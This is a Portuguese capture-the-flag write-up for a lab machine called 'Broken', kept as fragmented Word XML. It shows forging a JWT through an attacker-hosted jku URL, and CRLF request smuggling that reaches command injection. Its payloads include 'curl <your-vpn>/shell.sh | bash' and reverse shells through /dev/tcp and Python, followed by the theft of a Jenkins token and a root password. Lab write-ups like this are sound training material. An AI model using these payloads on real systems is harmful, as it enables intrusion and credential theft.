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120" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.74yjvd5ng7ij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34x0vs6gikz3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Broken.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7lig70nsy058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Iniciou-se o processo de enumeração com o objetivo de identificar os serviços expostos e as portas abertas no servidor alvo. Foi utilizada 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a enumeração dos serviços e portas expostas.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16300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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Observou-se que o acesso ao serviço web resultou em um redirecionamento para o domínio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broken.hc.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local de DNS durante os testes, o domínio foi inserido no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máquina utilizada.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711"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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7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web, verificou-se que o site exibia uma mensagem indicando que estava em manutenção.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13288"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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Iniciou-se a etapa de enumeração de subdomínios. Durante o processo de fuzzing de subdomínios, foram identificados dois subdomínios adicionais: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api.broken.hc: correspondente a um endpoint de API;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git.broken.hc: relacionado a um serviço de hospedagem Git (aparentemente baseado em Gitea)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49500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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exposta no subdomínio da API, iniciou-se a análise inicial de seus endpoints e funcionalidades disponíveis.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 ferramenta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ffuf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foram identificados os endpoints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/.well-known/jwks.json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/v1/api-docs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http://api.broken.hc/FUZZ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http://api.broken.hc/FUZZ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./Service-Specific/Swagger.txt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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr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3763"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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15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endpoint, foi possível obter a chave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jwks.json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utilizada para a validação dos JSON Web Tokens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(JWT)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http://api.broken.hc/.well-known/jwks.json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14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esse endpoint, foi identificada uma interface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Swagger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exposta, a qual disponibiliza a documentação completa da API, incluindo todas as rotas e seus respectivos parâmetros.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disponibiliza endpoints para registro de usuários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(/register)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autenticação e obtenção de tokens JWT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(/login)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funcionalidades administrativas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(/admin).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http://api.broken.hc/v1/api-docs/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51438"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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4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registrar um novo usuário por meio do endpoint disponibilizado pela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http://api.broken.hc/register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application/json'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'{"username":"teste","password":"teste"}'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85800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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token JWT foi obtido com sucesso por meio do processo de autenticação.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http://api.broken.hc/login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'{"username":"teste","password":"teste"}'|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15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decodificar o token JWT utilizando a ferramenta </w:t>
      </w:r>
      <w:hyperlink r:id="rId19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jwthunter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analisar seu conteúdo interno.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16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 do token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JWT,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identificou-se a presença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parâmetro jku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apontando para uma URL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valor desse campo refere-se a um arquivo ou endpoint que disponibiliza um conjunto de chaves criptográficas públicas em formato JSON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(JWKS)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Esse mecanismo é utilizado para permitir que aplicações externas validem a assinatura de tokens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JWT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emitidos pelo servidor de autorização, sem a necessidade de acesso à chave privada.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95234"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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23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o parâmetro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jku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seja devidamente validado pelo servidor, um atacante pode direcioná-lo para um endpoint externo de sua própria escolha. Isso permitiria o fornecimento de um conjunto de chaves maliciosas, possibilitando a geração de tokens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assinados de forma arbitrária e a consequente modificação dos dados contidos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realizar essa etapa, foi gerado um conjunto próprio de chaves criptográficas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 fim de compor um JWKS malicioso para validação indevida do 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private.pem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openssl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private.pem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-pubout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87400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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jwcrypto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PRIVATE_KEY_FILE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"private.pem"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PUBLIC_KEY_FILE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"public.pem"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JWKS_FILE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"jwks.json"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"http://&lt;vpn-ip&gt;:8000/jwks.json"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attacker-controlled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open(PRIVATE_KEY_FILE,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"rb")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open(PUBLIC_KEY_FILE,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"rb")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public_pem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jwk.JWK.from_pem(public_pem)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jwk_dict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key.export(as_dict=True,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private_key=False)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jwk_dict["kid"]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{"keys":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[jwk_dict]}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open(JWKS_FILE,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json.dump(jwks,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indent=2)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{JWKS_FILE}")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"&lt;your-user&gt;",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"admin":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"alg":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"RS256",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"JWT",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"jku":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JKU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jwt.encode(payload,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private_key,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algorithm="RS256",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token:\n")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gerar um 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oken JWT com permissões administrativas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58900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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81300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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já possuíamos um token com permissões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administrativas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acessar funcionalidades restritas da aplicação. Entre elas, destacou-se o acesso à rota administrativa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/admin/users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1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'GET'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'http://api.broken.hc/admin/users'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74900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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Além disso, ao realizar uma requisição direta à API na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/admin/users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obter a hash de autenticação do usuário admin.</w:t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$2b$10$YzpZJ7ul8qR4tPCEUWeg1eRYbvHHvwjOmWYl1pBGBgpa0JolfqHGe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hash obtida, a senha do usuário foi quebrada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Hashcat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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16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0" l="0" r="0" t="0"/>
            <wp:docPr id="1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senha obtida foi utilizada para realizar a autenticação direta na aplicação,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http://git.broken.hc/</w:t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41888"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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8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essa aplicação, não foram identificadas informações. O único conteúdo disponível consistia em um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escrito em formato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Markdown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informando que o repositório havia sido removido do ambiente de produção. Adicionalmente, o arquivo fornecia a referência a um subdomínio adicional,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check-development.broken.hc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a existência de outro subdomínio para análise.</w:t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16200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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acessado o subdomínio</w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/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http://check-development.broken.hc/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16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clicar no botão, o usuário foi redirecionado para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/page/error.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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79700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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Nessa rota, foi possível visualizar mensagens de erro da aplicação.</w:t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85900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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realizar um processo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nessa rota, foi possível identificar a existência dos arquivos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acessíveis pela aplicação.</w:t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http://check-development.broken.hc/page/FUZZ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3788"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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7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da funcionalidade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view-source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visualizar o código-fonte dos arquivos da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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92300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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1900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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visualização do código dos arquivos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aplicação só foi possível devido ao uso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readfile,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identificada no arquivo,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index.php,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qual permitia a leitura do conteúdo dos arquivos da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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se encontrava disponível ou acessível por meio da aplicação web.</w:t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16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identificada uma característica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atípica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servidor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Apache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parâmetros do tipo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?page=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não eram suportados, comportamento atribuído à configuração do módulo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mod_rewrite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apache.</w:t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Módulo do Apache que permite modificar e redirecionar URLs automaticamente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">
      <w:pPr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que serve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Criar URLs amigáveis (ex: /produto/42 em vez de /produto.php?id=42)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Redirecionar páginas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Direcionar requisições para um único arquivo</w:t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1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identificada uma falha na configuração do servidor Apache, relacionada ao uso do módulo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mod_rewrite/proxy rewrite,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qual os dados inseridos após o caminho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/page/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não passavam por validação ou sanitização adequada. Esse comportamento permitia a injeção de conteúdo adicional na requisição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inclusive elementos do próprio protocolo.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consequência, tornou-se possível manipular o fluxo de processamento da aplicação e acionar, de forma indireta,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mesmo este não estando acessível diretamente pela interface web. Esse cenário foi possível devido à injeção dos caracteres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\r e \n,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caracterizando um ataque do tipo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CRLF Injection.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Dessa forma, foi possível acionar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check.php,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qual continha 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shell_exec,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por executar comandos diretamente no sistema operacional. Com isso, foi possível executar comandos no sistema.</w:t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HTTP/1.1\r\n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check-development.broken.hc\r\n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curl/8.17.0\r\n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keep-alive\r\n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/check.php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HTTP/1.1\r\n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check-development.broken.hc\r\n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application/x-www-form-urlencoded\r\n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Content-Length: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43\r\n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\r\n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domain=;&lt;your-command&gt;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--path-as-is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check-development.broken.hc/page/test%20HTTP/1.1%0D%0AHost:%20check-development.broken.hc%0D%0AUser-Agent:%20curl%0D%0AConnection:%20keep-alive%0D%0A%0D%0APOST%20/check.php%20HTTP/1.1%0D%0AHost:%20check-development.broken.hc%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2043%0D%0A%0D%0Adomain=%3&lt;your-command&gt;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executar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sistema, validando a existência de um vulnerabilidade chamada command injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D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09600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="13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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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executar uma reverse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utilizado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ler um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arbitrário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hospedado externamente e, em seguida, executar seu conteúdo no sistema, resultando no estabelecimento da conexão reversa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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/dev/tcp/&lt;your-vpn&gt;/443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01700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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--path-as-is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check-development.broken.hc/page/test%20HTTP/1.1%0D%0AHost:%20check-development.broken.hc%0D%0AUser-Agent:%20curl%0D%0AConnection:%20keep-alive%0D%0A%0D%0APOST%20/check.php%20HTTP/1.1%0D%0AHost:%20check-development.broken.hc%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2043%0D%0A%0D%0Adomain=%3bcurl%20&lt;your-vpn&gt;/shell.sh%20%7c%20bash%3b%0D%0A%0D%0AGET%20/test%20HTTP/1.1%0D%0AHost:%20check-development.broken.hc%0D%0A%0D%0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lido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executado pelo sistema, resultando na obtenção de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1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16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14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obtenção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realizado o ajuste para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 TTY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uma interação mais estável e completa com o sistema, incluindo melhor controle de entrada/saída e execução de comandos interativos.</w:t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crt+z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27200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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encontrado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calculator.py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/opt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78100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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aceita entradas do usuário sem validação adequada e as envia ao servidor para processamento. Esse comportamento possibilita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injeção de comandos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caracterizando uma vulnerabilidade chamada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input("Enter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s.sendall(expression.encode())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dessa falha, foi possível invocar a biblioteca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consequentemente, utilizar chamadas ao sistema para executar comandos diretamente no sistema operacional. Com isso, foi possível acionar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estabelecendo uma conexão remota com o sistema comprometido.</w:t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__import__('os').system('bash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0&gt;&amp;1"')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"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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resultado, foi estabelecida uma nova conexão reversa utilizando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leonardo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14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usuário foi encontrada no diretório do usuário.</w:t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15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jenkins_token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qual correspondia a um token de autenticação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Jenkins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Nesse arquivo, também foi identificado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ek1l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associado ao token do Jenkins.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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/etc/jenkins_token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75238"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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também estava em execução na máquina.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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9100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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token foi exportado para ser utilizado na autenticação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JENKINS_TOKEN=$(tail -n 1 /etc/jenkins_token)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-u ek1l:$JENKINS_TOKEN 'http://127.0.0.1:8080/api/json?tree=jobs%5Bname,url%5D'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1000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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acesso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Jenkins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listar os jobs da aplicação, sendo identificado um job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project.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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-u ek1l:$JENKINS_TOKEN "http://127.0.0.1:8080/job/project/api/json?pretty=true"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54400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="15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verificar o output do job project, foi identificada uma variável denominada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MY_VAR2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contendo o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ex3ZDK1I4Lxmm77wzp0wCic3Bno7hXu2iX4VeSeZj.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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ek1l:$JENKINS_TOKEN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"http://127.0.0.1:8080/job/project/1/consoleText"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MY_VAR2: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ex3ZDK1I4Lxmm77wzp0wCic3Bno7hXu2iX4VeSeZj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338"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="14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3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senha foi utilizada para realizar login na aplicação com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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="17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root foi localizada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sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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58800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="16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headerReference r:id="rId61" w:type="even"/>
      <w:footerReference r:id="rId62" w:type="default"/>
      <w:footerReference r:id="rId63" w:type="first"/>
      <w:footerReference r:id="rId6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0">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.z4bc3uhbvyv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-866769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77" name="image45.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image45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1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2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-942969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76" name="image39.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image39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-349240</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5767071</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6696075" cy="3025204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Broken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-349240</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5767071</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6696075" cy="3025204"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="129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6075" cy="30252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41.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14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8.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15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pp.hackingclub.com/laboratory/competition-machines/293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yperlink" Target="http://check-development.broken.hc/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://check-development.broken.hc/" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jwthunter.io/" TargetMode="External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5.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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9.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5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jGI+1qaa/aC0azBPGpxIKPoxGw==">CgMxLjAyDmguNzR5anZkNW5nN2lqMg5oLjM0eDB2czZnaWt6MzIOaC43bGlnNzBuc3kwNTgyDmguejRiYzN1aGJ2eXY5OAByITFCNkFvLVlZQ3BVSmlZc1pscHhkR3pSb19QbkVRcFBRMA==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